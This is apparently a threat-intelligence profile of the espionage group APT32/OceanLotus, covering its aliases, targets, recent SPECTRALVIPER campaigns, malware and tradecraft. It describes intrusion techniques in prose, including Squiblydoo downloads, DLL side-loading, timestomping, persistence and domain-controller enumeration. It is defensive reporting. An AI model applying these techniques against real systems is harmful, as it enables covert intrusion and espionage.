APT32

APT32, most widely known as OceanLotus, is a Vietnam-aligned advanced persistent threat actor assessed in the provided content as operating in support of Vietnamese government interests. Reported aliases include APT-C-00, Bismuth, Canvas Cyclone, Cobalt Kitty, Lotus Bane, Ocean Buffalo, OceanLotus Group, Pond Loach, SeaLotus, SectorF01, and Tin Woodlawn. The content describes OceanLotus as active since at least 2012 and engaged in cyber espionage against both domestic and foreign targets. Reported targeting includes Vietnamese human rights activists and dissidents, civil society and media organizations, ASEAN-related entities, foreign governments including Laos and Cambodia, stock investors in Vietnam, Vietnamese public companies, an unnamed Vietnamese infrastructure and transport construction corporation, and businesses in information technology, hospitality, agriculture and commodities, hospitals, retail, automotive, and mobile services. The group has also been reported targeting Chinese entities, including the Wuhan municipal government and China’s Ministry of Emergency Management, and historically companies with business interests in Vietnam. Recent activity in the content attributes two campaigns to OceanLotus centered on the SPECTRALVIPER backdoor. One was a supply-chain compromise of FireAnt Metakit from roughly October 2025 to March 2026 that selectively delivered malware to stock investors in Vietnam via the software’s legitimate update mechanism, followed by reconnaissance, HTTP POST staging, DLL side-loading through a rogue DtlCrashCatch.dll, and injection into OneDrive.Sync.Service.exe. The second targeted a Vietnamese construction-sector organization from at least November 2024 to February 2026, where ESET suspected initial access via remote code execution vulnerabilities in a public-facing Microsoft SQL Server and observed multiple SPECTRALVIPER variants used for persistence, profiling, lateral movement, and C2 via gatewayrvcenter[.]com. The content states both campaigns suggest increased emphasis on domestic espionage. The actor is described as using a broad mix of custom malware and commodity tooling. Named malware and tools in the content include SPECTRALVIPER, SOUNDBITE, PHOREAL, WINDSHIELD, Cobalt Strike Beacon, NetCat, Mimikatz, and ZiChatBot-related droppers. Tradecraft explicitly mentioned includes heavy PowerShell obfuscation with Invoke-Obfuscation, use of regsvr32 "Squiblydoo" to download second stages, COM scriptlets to download Cobalt Strike beacons, JavaScript for drive-by downloads and command-and-control, PowerShell one-liners and shellcode loaders, cmd.exe execution, WMI for remote deployment and Outlook process reconnaissance, Registry Run keys for persistence, scheduled task XML with backdated timestamps, timestomping to match kernel32.dll creation times, masquerading payloads as Windows updates or Flash installers, process injection of Cobalt Strike into rundll32.exe, querying the Windows Registry for host information, collecting OS version, computer name, usernames, and IP address information, enumerating domain controllers with net group "Domain Controllers" /domain, and using ping for discovery. The content also notes exfiltration over an already established C2 channel. The content further documents OceanLotus macOS operations. Reported macOS backdoors were delivered via ZIP archives or malicious Word documents themed for Vietnamese users, used decoy documents, Perl-based or shell-script loaders, LaunchAgent or LaunchDaemon persistence, hidden files, permission changes, timestomping, self-deletion, and encrypted strings and communications. These implants collected host identifiers including serial number, hardware UUID, MAC addresses, processor, memory, OS version, username, computer name, and architecture, and supported commands to download and execute files, run terminal commands, upload and download files, remove files, retrieve configuration, send heartbeat packets, and in one variant receive a delete command. The content also describes OceanLotus infrastructure and influence-style operations, including fake news websites and Facebook pages used to profile visitors in Vietnam and across Southeast Asia and occasionally deliver malware designed to log keystrokes. Public reporting cited in the content links OceanLotus to activity aligned with Vietnamese state interests, and one source notes Meta linked OceanLotus activity in 2020 to CyberOne Group, also called CyberOne Security, CyberOne Technologies, and Hành Tinh Company Limited, though CyberOne denied the allegation.